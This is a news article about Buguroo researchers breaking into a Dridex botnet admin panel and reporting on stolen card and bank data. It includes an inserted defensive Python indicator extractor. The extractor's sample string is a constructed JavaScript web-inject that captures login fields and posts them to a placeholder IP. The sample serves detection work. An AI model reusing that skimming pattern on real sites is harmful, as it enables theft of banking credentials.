Buguroo’s security researchers found one of Dridex’s admin panels and, after leveraging an older vulnerability in its backend, broke into it and recovered the victims’ data stored there.
The investigation started in January 2016, when Buguroo’s bugFraud Defense endpoint protection system raised a classic Dridex alert: web injections in a user’s browser, where the Dridex malware was loading malicious JavaScript into banking websites in order to steal authentication credentials.
On closer analysis of the alerts, the researchers found the IP address of one of the Dridex admin panels hardcoded in the malicious JavaScript files used to hijack the user’s web browser.
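The hardcoded panel address is the kind of indicator an analyst pulls out of a captured inject before anything else. The following is an added example, not Buguroo’s tooling or any Dridex code: it takes a constructed stand-in for an injected credential-stealing script (the IP 192.0.2.10 and the bank hostname are placeholder values, not real Dridex indicators) and extracts every URL or bare IPv4 address that does not belong to the bank’s own origins, flagging the script when such a foreign destination is combined with a network-send call.

```python
"""Extract hard-coded network indicators from a captured web-inject script.

Added example for illustration only. SAMPLE_INJECT is a constructed stand-in
for a credential-stealing inject; 192.0.2.10 and the hostnames are
documentation/placeholder values, not real indicators.
"""
import re
from urllib.parse import urlparse

# Constructed sample: hooks the login form and posts the captured fields to a
# hard-coded IP, while also loading a script from the bank's real CDN.
SAMPLE_INJECT = r"""
(function(){
  var c2 = "http://192.0.2.10/gate.php";
  var f = document.forms["login"];
  f.addEventListener("submit", function(){
    var x = new XMLHttpRequest();
    x.open("POST", c2, true);
    x.send("u=" + f.user.value + "&p=" + f.pass.value);
  });
  var s = document.createElement("script");
  s.src = "https://cdn.example-bank.test/static/app.js";  // legitimate origin
  document.head.appendChild(s);
})();
"""

# Hosts the bank legitimately serves content from (assumed for the example).
TRUSTED_HOSTS = {"www.example-bank.test", "cdn.example-bank.test"}

# Dotted-quad IPv4 with each octet limited to 0-255; \b stops partial matches.
IPV4_RE = re.compile(
    r"\b(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)\b"
)
# http(s) URLs up to the first quote, whitespace or closing bracket.
URL_RE = re.compile(r"""https?://[^\s'"<>)]+""")
# Calls that move data off the page; a foreign URL next to one is suspicious.
SEND_RE = re.compile(r"XMLHttpRequest|fetch\(|navigator\.sendBeacon|\.src\s*=")


def extract_indicators(script: str, trusted_hosts: set) -> dict:
    """Return foreign URLs, bare IPv4 addresses and an exfiltration verdict.

    A URL is 'foreign' when its hostname is not in trusted_hosts; an IP
    literal used as a hostname is always foreign because banks do not serve
    login pages from bare IPs.
    """
    urls = set(URL_RE.findall(script))
    foreign_urls = sorted(
        u for u in urls if urlparse(u).hostname not in trusted_hosts
    )
    ips = sorted(set(IPV4_RE.findall(script)))
    exfil_suspected = bool(foreign_urls) and SEND_RE.search(script) is not None
    return {
        "foreign_urls": foreign_urls,
        "ipv4": ips,
        "exfil_suspected": exfil_suspected,
    }


if __name__ == "__main__":
    result = extract_indicators(SAMPLE_INJECT, TRUSTED_HOSTS)
    for key, value in result.items():
        print(f"{key}: {value}")
```

Run against real captures, the trusted-host allowlist is the part that matters: without it every CDN and analytics host the bank legitimately uses shows up as a false positive, and with it the only thing left is what the inject itself brought along.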
Because Dridex operations are carried out on a massive scale, the hackers behind this huge botnet split it into multiple smaller infrastructures, called subnets. This fractured architecture makes Dridex’s operations harder for security companies to detect, and harder to sinkhole.
Buguroo researchers discovered the admin panel of a Dridex section previously known as Subnet 220. Fortunately, that subnet was running an older version of the Dridex backend, in which weaknesses had previously been discovered.
Thanks to this vulnerability, the researchers cracked open Subnet 220’s admin panel and looked inside. By recovering the data found in this backend, they were able to determine the scale at which these hackers operate and discovered new techniques used in some recent attacks.
Apart from uncovering evidence of which hackers are behind the recent Locky ransomware infections, the experts found victim data that included bank accounts, victim names, last login dates, and card numbers with additional details such as the card’s type, issuing bank and country. Most of this data belonged to banks in English-speaking countries, though the victims were from all over the world.
The statistics show data from more than 100 countries, belonging to over 900 business entities, of which 70% were English-speaking issuing organizations, while 85% of the victims were from non-English-speaking countries.
According to the researchers, the Dridex hackers operate in short-burst campaigns, launching multiple attacks at various intervals. On average, the criminals collect 16,000 credit card numbers per campaign and steal around $500 from each victim.
Since banks detect and block these illicit transactions in about 90% of cases, the hackers still pocket around $800,000 per campaign (16,000 cards at $500 each, of which only the remaining 10% of transactions go through).